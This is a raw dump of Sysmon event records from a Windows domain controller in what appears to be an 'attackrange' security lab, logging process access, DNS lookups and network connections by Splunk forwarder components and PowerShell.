Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2769C6301CE1D25A7FE10D716CB8FAB7,SHA256=AA70DAEDBB96A753164E8A34A6B448589E4CC857A5FA8E7EF2AE9CDACE09778A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:59.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.495{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.496{4DB9351A-A327-60D3-3A06-00000000CF01}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000025075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.323{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3920E482196F8E0238627DD96D5CAA69,SHA256=F8B27FBE5B7D4064DCAE1BDBE35653B8B4FE6A919E91548E95A8E386E05EA81E,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:56.173{4DB9351A-A323-60D3-3406-00000000CF01}6980raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.120{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBEBB2EB7564F1D1B22B4459FC7B201,SHA256=D07B694FFF31381EC61BF9D426E1D22E0D7D1B573F883CA7741849700BC5F5BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.510{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21259BBDC189D0C2D055F27532923931,SHA256=A70ABE37074D7DB8C08076961BA2CBA06FFD864280331A286AAC2AA6B5492288,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.700{4DB9351A-A326-60D3-3906-00000000CF01}6228github.com0::ffff:192.30.255.113;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.214{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BEF833CC191F7C546F147308B8AD4525,SHA256=F5F36EECCB7839300D801003EBC567279AD1611DDACC06FD11337186811EBC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:00.120{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A17F3A298EE4CB5245121E1D491413F,SHA256=1184998D2C9E53838FC573C0522D23DB6D9C67CBA3FABB7A3322F061294FBA7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.692{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53055- 354300x800000000000000025084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.097{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58298- 354300x800000000000000025095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.463{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61532-false185.199.109.154cdn-185-199-109-154.github.com443https 354300x800000000000000025094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.454{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local60268- 354300x800000000000000025093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.292{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61531-false192.30.255.113lb-192-30-255-113-sea.github.com443https 354300x800000000000000025092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:59.253{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61530-false10.0.1.12-8000- 354300x800000000000000025091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.702{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61529-false192.30.255.113lb-192-30-255-113-sea.github.com443https 23542300x800000000000000025090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:01.121{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8EF93CB9135E5ED53855D863FC949F9,SHA256=B9A3FB50F1F7A147A82F14BF8A608029C290724A7E987D793386052EC7B02BC2,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:59.463{4DB9351A-A326-60D3-3906-00000000CF01}6228github-releases.githubusercontent.com0::ffff:185.199.109.154;::ffff:185.199.110.154;::ffff:185.199.111.154;::ffff:185.199.108.154;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:02.150{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78EDC8A0CEEAFC1E87B62DE95E7EC23,SHA256=F066DE6FC6B0187D41590B2C81F4AF947E514332C28679C915A926F8F00A0557,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:01.176{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local57055- 23542300x800000000000000025098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:03.155{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=102DA7CFDB60E2FE9FFD72B173BE0A4B,SHA256=E1CECE5E2C55C09D42A75C37E11B02884BEA7BDF42E9A15EFB96EC08052EB5AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.983{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.983{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:04.967{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dl
l+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
